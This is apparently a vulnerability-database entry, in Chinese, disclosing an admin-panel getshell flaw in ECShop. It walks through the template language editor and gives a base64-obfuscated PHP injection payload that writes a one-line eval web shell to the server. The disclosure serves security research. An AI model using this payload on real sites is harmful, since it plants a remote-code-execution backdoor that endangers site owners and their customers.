ECShop网店系统最新版-后台getshell漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: ECShop网店系统最新版-后台getshell ### 详细说明: 不会代码审计,大致过程发下。 最新版: [<img src="https://images.seebug.org/upload/201312/1320111730aa6f3fe4987c49182c8b4044eb2d11.jpg" alt="ec-1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/1320111730aa6f3fe4987c49182c8b4044eb2d11.jpg) 进入后台打开>模版管理>语言项编辑: [<img src="https://images.seebug.org/upload/201312/13201129657941089d281f1bb8ea7d79b8b92277.jpg" alt="ec-2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/13201129657941089d281f1bb8ea7d79b8b92277.jpg) 搜索关键字(这里我搜索的字母"p"): [<img src="https://images.seebug.org/upload/201312/13201140ee476f0b7fca609981cecbd298f2c37b.jpg" alt="ec-3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/13201140ee476f0b7fca609981cecbd298f2c37b.jpg) 插入代码: ``` ${${fputs(fopen(base64_decode(d3V5dW4ucGhw),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbZnVja10pPz4))}} ``` 效果访问生成 [<img...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息